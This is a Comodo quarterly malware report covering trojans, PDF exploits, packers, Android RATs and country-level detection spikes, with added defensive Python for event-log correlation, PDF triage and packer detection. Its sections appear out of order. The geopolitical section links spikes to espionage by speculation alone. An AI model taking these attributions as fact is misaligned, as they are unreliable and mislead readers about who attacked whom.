The most common Backdoor that Comodo detected in Q2 2018 was DarkComet, a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system through a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
522 Viruses A computer virus is self-replicating code that "infects" other programs and devices by modifying them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot reach another computer unless a user moves the infected file or performs some action such as opening an attachment or clicking a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" threat that infects Windows executable files (.exe) and HTML files (.html) and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
523 Trojans Trojans take their name from the wooden horse of Greek mythology because their malicious functionality is hidden within seemingly useful or benign programs. Typically Trojans grant remote attackers the same rights and privileges as the local user and can be used for many kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the Administrators group as a "Remote Service Account". On a Windows host this leaves a clear audit trail: a new local account (Security event 4720) followed shortly by the addition of that account to a security-enabled local group (event 4732), which a defender can alert on.
The bubble chart shows that Germany (de) was the top country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
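The account-creation behavior attributed to Starter above can be caught from the Windows Security log without any malware signature. The script below is an added example, not Comodo's or Microsoft's code: it pairs a 4720 (account created) with a 4732 (member added to a security-enabled local group) for the same SID and raises a high-severity alert when the group is Administrators and the two events are minutes apart, while the same group change hours later is reported at lower severity as ordinary administration. The records are constructed, and the JSON-lines export format and the account names are assumptions; the field names follow the Windows event schema.

```python
"""Correlating the account-creation pattern attributed to the Starter trojan (5.2.3).

Added example, not Comodo's code. Windows writes Security event 4720 when a
local account is created and 4732 when a member is added to a security-enabled
local group. A 4732 into Administrators within minutes of the 4720 for the same
SID is the Starter behaviour described above. The records below are
constructed; the JSON export and the account names are assumptions.
"""
import json
from datetime import datetime, timedelta

ADMIN_GROUPS = {"Administrators"}
FAST_WINDOW = timedelta(minutes=10)

EVENTS = """\
{"EventID": 4720, "Time": "2018-06-04T02:14:05", "TargetUserName": "RemoteSvc$", "TargetSid": "S-1-5-21-1-2-3-1105", "SubjectUserName": "svc_backup"}
{"EventID": 4732, "Time": "2018-06-04T02:14:06", "MemberSid": "S-1-5-21-1-2-3-1105", "TargetUserName": "Administrators", "SubjectUserName": "svc_backup"}
{"EventID": 4720, "Time": "2018-06-04T09:00:00", "TargetUserName": "jdoe", "TargetSid": "S-1-5-21-1-2-3-1106", "SubjectUserName": "helpdesk"}
{"EventID": 4732, "Time": "2018-06-04T09:00:30", "MemberSid": "S-1-5-21-1-2-3-1106", "TargetUserName": "Users", "SubjectUserName": "helpdesk"}
{"EventID": 4732, "Time": "2018-06-04T15:00:00", "MemberSid": "S-1-5-21-1-2-3-1106", "TargetUserName": "Administrators", "SubjectUserName": "helpdesk"}
"""


def parse(export):
    """Load one JSON record per line and sort by time."""
    events = [json.loads(line) for line in export.splitlines() if line.strip()]
    for e in events:
        e["Time"] = datetime.fromisoformat(e["Time"])
    return sorted(events, key=lambda e: e["Time"])


def correlate(events, window=FAST_WINDOW):
    """Pair each 4720 with a later 4732 into an admin group for the same SID."""
    created = {}          # SID of a newly created account -> its 4720 record
    alerts = []
    for e in events:
        if e["EventID"] == 4720:
            created[e["TargetSid"]] = e
        elif e["EventID"] == 4732 and e["TargetUserName"] in ADMIN_GROUPS:
            origin = created.get(e["MemberSid"])
            if origin and e["Time"] - origin["Time"] <= window:
                alerts.append({"severity": "high", "account": origin["TargetUserName"],
                               "group": e["TargetUserName"], "by": e["SubjectUserName"],
                               "seconds_after_creation": int((e["Time"] - origin["Time"]).total_seconds())})
            else:
                # Privileged group change without a fresh account: still worth a look.
                alerts.append({"severity": "medium", "member_sid": e["MemberSid"],
                               "group": e["TargetUserName"], "by": e["SubjectUserName"]})
    return alerts


if __name__ == "__main__":
    for alert in correlate(parse(EVENTS)):
        print(alert)
```

The correlation keys on the SID rather than the account name because 4732 records the member as a SID, and because an attacker choosing a name that resembles a service account (as in the constructed "RemoteSvc$") is exactly the case the rule must not be fooled by. The account that performed the action (SubjectUserName) is the pivot for the investigation that follows, since Starter runs under whatever user launched it.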
524 Exploits Computer exploits comprise software, chunks of data or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
Detections of computer exploits can be comparatively rare, as the vulnerabilities they target are typically patched and fixed quickly once discovered.
In Q2 2018 the majority of exploits detected by Comodo targeted a favorite hacker target, Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents in a common form independent of application software, hardware and operating systems. PDF attracts attackers because readers implement a large feature set, including embedded JavaScript, actions that run automatically when a document opens, launch actions and embedded files, each of which has hosted exploits or been abused on its own.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
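The PDF features named above can be triaged statically before a file is ever opened, which is what pdfid-style tools do. The script below is an added example, not Comodo's tooling: it counts the risky names (/JavaScript, /JS, /OpenAction, /AA, /Launch and a few others) in a PDF, first undoing the #xx name escaping that malicious documents use to hide those very keywords from naive scanners, and turns the counts into a score. The two documents are constructed byte strings, not real samples, and the weights and threshold are assumptions of the example.

```python
"""Static triage of a PDF for the features exploit documents rely on (5.2.4).

Added example, not Comodo's code. The names that pdfid-style tools count are
searched for: /JavaScript and /JS (script execution), /OpenAction and /AA
(run without a click), /Launch (start an external program), /EmbeddedFile,
/RichMedia and /ObjStm, plus the #xx name escaping a benign file rarely
uses. Both PDFs below are constructed; weights and threshold are assumptions.
"""
import re

# Name-token obfuscation: /J#61vaScript is /JavaScript with an escaped 'a'.
HEX_NAME = re.compile(rb"#([0-9A-Fa-f]{2})")

RISKY = {
    b"/JavaScript": 3, b"/JS": 3, b"/OpenAction": 2, b"/AA": 2,
    b"/Launch": 3, b"/EmbeddedFile": 1, b"/RichMedia": 2, b"/ObjStm": 1,
}

BENIGN = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R >> endobj
4 0 obj << /Length 35 >> stream
BT /F1 12 Tf 72 700 Td (Hello) Tj ET
endstream endobj
trailer << /Root 1 0 R >>
%%EOF"""

SUSPECT = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /AA << /O 5 0 R >> >> endobj
5 0 obj << /S /J#61vaScript /JS (app.alert(1)) >> endobj
trailer << /Root 1 0 R >>
%%EOF"""


def normalise(data):
    """Undo #xx escapes inside names so obfuscated keywords can be counted."""
    return HEX_NAME.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def triage(data):
    """Return (score, counts); a score of 5 or more is worth sandboxing first."""
    escaped = len(HEX_NAME.findall(data))
    body = normalise(data)
    # The lookahead stops /JS from matching inside e.g. /JSxyz and /AA inside /AAA.
    counts = {k.decode(): len(re.findall(re.escape(k) + rb"(?![A-Za-z])", body))
              for k in RISKY}
    counts["escaped_names"] = escaped
    score = sum(RISKY[k.encode()] * n for k, n in counts.items() if k != "escaped_names")
    score += 2 if escaped else 0      # obfuscation is itself a signal
    return score, counts


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspect", SUSPECT)):
        score, counts = triage(doc)
        print(label, score, {k: v for k, v in counts.items() if v})
```

A count-based triage like this is a filter, not a verdict: a legitimate form can carry /JavaScript and /AA, and a real exploit can hide its keywords inside a compressed object stream where a byte search never sees them (which is why /ObjStm earns a point of its own and why the next step for a high score is to inflate the streams or run the file in a sandbox).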
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018, Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
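To show how a packed binary such as the UPX-derived MUPX described above is recognised on the defender's side, here is an added example (not Comodo's or UPX's code) that reads a PE section table and flags the classic UPX layout (an empty first section with a large virtual size, followed by a high-entropy compressed section) as well as high section entropy on its own, which still fires when a modified packer renames its sections. The PE images are constructed minimal containers, not real executables.

```python
"""Packer triage on a PE section table: UPX-style section names, an empty
first section with a large virtual size, and high byte entropy in raw data.

Added example; not code from the report or from UPX. The PE images below are
constructed minimal containers (DOS stub, PE signature, COFF header, section
table, raw section data) that parse like a real file but do not run.
"""
import math
import random
import struct
from collections import Counter

UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}
HIGH_ENTROPY_BITS = 7.0          # compressed or encrypted data sits close to 8 bits/byte
SECTION_FORMAT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 0.0 for an empty buffer."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(image: bytes):
    """Walk the PE headers and return name, sizes and raw-data entropy per section."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (pe_offset,) = struct.unpack_from("<I", image, 0x3C)          # e_lfanew
    if image[pe_offset:pe_offset + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    (section_count,) = struct.unpack_from("<H", image, pe_offset + 6)
    (optional_size,) = struct.unpack_from("<H", image, pe_offset + 20)
    table = pe_offset + 24 + optional_size                         # after signature + COFF header
    sections = []
    for i in range(section_count):
        name, vsize, _vaddr, raw_size, raw_ptr, *_ = struct.unpack_from(
            SECTION_FORMAT, image, table + 40 * i)
        raw = image[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "raw_size": raw_size,
                         "entropy": shannon_entropy(raw)})
    return sections


def packing_indicators(sections):
    """Return human-readable indicators; an empty list means nothing packer-like was seen."""
    found = []
    if {s["name"].encode() for s in sections} & UPX_SECTION_NAMES:
        found.append("UPX section names present")
    for s in sections:
        # UPX leaves its first section empty on disk; the unpacked image is written there at run time
        if s["raw_size"] == 0 and s["virtual_size"] >= 0x1000:
            found.append(f"{s['name']}: no raw data but {s['virtual_size']:#x} bytes virtual size")
        if s["raw_size"] and s["entropy"] >= HIGH_ENTROPY_BITS:
            found.append(f"{s['name']}: entropy {s['entropy']:.2f} bits/byte")
    return found


def build_sample_pe(section_specs):
    """Assemble a minimal PE container from (name, virtual_size, raw_bytes) tuples."""
    pe_offset, optional_size = 64, 0
    data_start = pe_offset + 24 + 40 * len(section_specs)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_offset)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(section_specs), 0, 0, 0,
                                   optional_size, 0x102)
    table, blobs = b"", b""
    for name, vsize, raw in section_specs:
        raw_ptr = data_start + len(blobs) if raw else 0
        table += struct.pack(SECTION_FORMAT, name.ljust(8, b"\0"), vsize, 0x1000, len(raw),
                             raw_ptr, 0, 0, 0, 0, 0x60000020)
        blobs += raw
    return dos + coff + table + blobs


# Constructed samples: seeded pseudo-random bytes stand in for a compressed image
_rng = random.Random(2018)
COMPRESSED_BLOB = bytes(_rng.getrandbits(8) for _ in range(4096))
PLAIN_CODE = b"This program cannot be run in DOS mode.\r\n" * 50

PACKED_SAMPLE = build_sample_pe([(b"UPX0", 0x20000, b""), (b"UPX1", 0x8000, COMPRESSED_BLOB),
                                 (b".rsrc", 0x1000, b"RSRC" * 64)])
RENAMED_PACKED_SAMPLE = build_sample_pe([(b".text", 0x20000, b""), (b".data", 0x8000, COMPRESSED_BLOB)])
UNPACKED_SAMPLE = build_sample_pe([(b".text", 0x2000, PLAIN_CODE), (b".data", 0x1000, b"\0" * 512)])

if __name__ == "__main__":
    for label, image in [("packed", PACKED_SAMPLE), ("renamed", RENAMED_PACKED_SAMPLE),
                         ("unpacked", UNPACKED_SAMPLE)]:
        print(label, packing_indicators(parse_sections(image)) or ["clean section table"])
```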
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm email servers with messages in order to "kill" or shut them down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite, and include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Moreover, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the number of usual detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose, either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
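Every country section above starts from the same observation: a day whose detection count dwarfs the surrounding days (the North Korea spike was "well over ten times" the usual level). The following is an added example, not Comodo's analysis code, that flags such days against a rolling median baseline so that one huge day does not inflate the baseline and hide a second spike shortly afterwards; the daily series is constructed.

```python
"""Flag days whose detection count is a multiple of the recent baseline, the
kind of spike the geopolitical timelines above are built around.

Added example; not Comodo's code. The daily series is constructed. The
baseline is the median of the preceding days, so a single huge day does not
drag the baseline up and mask a second spike a few days later.
"""
from datetime import date, timedelta
from statistics import median

BASELINE_DAYS = 14
SPIKE_RATIO = 10.0      # the report treats a day at well over 10x the usual level as a spike
MIN_BASELINE = 20       # below this many detections a day the ratio is noise, not signal


def find_spikes(series, baseline_days=BASELINE_DAYS, ratio=SPIKE_RATIO, min_baseline=MIN_BASELINE):
    """series: list of (iso_date, count) in date order.
    Returns [(iso_date, count, baseline, count / baseline)] for every day whose
    count is at least `ratio` times the median of the preceding `baseline_days` days."""
    spikes = []
    for i in range(baseline_days, len(series)):
        baseline = median([count for _, count in series[i - baseline_days:i]])
        day, count = series[i]
        if baseline >= min_baseline and count >= ratio * baseline:
            spikes.append((day, count, baseline, count / baseline))
    return spikes


def build_sample_series(start=date(2018, 4, 12), days=40):
    """Constructed daily counts: a 100-122 background, one 1400-detection day, one 250-detection bump."""
    series = []
    for i in range(days):
        count = 100 + (i * 37) % 23
        if i == 20:
            count = 1400      # the kind of day the report highlights
        elif i == 25:
            count = 250       # noticeable, but not a spike at the chosen ratio
        series.append(((start + timedelta(days=i)).isoformat(), count))
    return series


SAMPLE_SERIES = build_sample_series()

if __name__ == "__main__":
    for day, count, baseline, factor in find_spikes(SAMPLE_SERIES):
        print(f"{day}: {count} detections, {factor:.1f}x the {baseline:.0f}/day baseline")
```

Lowering `ratio` to 2.0 also surfaces the 250-detection bump, which is the trade-off between catching smaller events and drowning an analyst in ordinary day-to-day variation.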
8 Conclusions
In Q2, Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Disguises of Hero Rat: شارژ رایگان بگیر (Get Free Credit), App Master, Anti Rat PlatformA, فالورگیر نامحدود (Unlimited Follower Getter), اینترنت رایگان (Free Internet)
Its code is available on the Telegram hacking channel. Noticeably, it's sold in three options: bronze, silver and gold.
After infiltration into a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts the spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Disguises of Sonvpay (Version 1): Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises named above.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them updating its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Disguises of CoinHive: Version-1: Netflix Hack, Instagram Hack; Version-2: TSF Launcher; Version-3: Android Service, PlacarTv Futebol Ao Vivo
The malware is covertly propagated via... another cryptominer, named CoinMiner.
How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim: thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Chart: Android-targeted malware in April
4.2.2 May 2018
Chart: Android-targeted malware in May
4.2.3 June 2018
Chart: Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLD). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial-of-service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
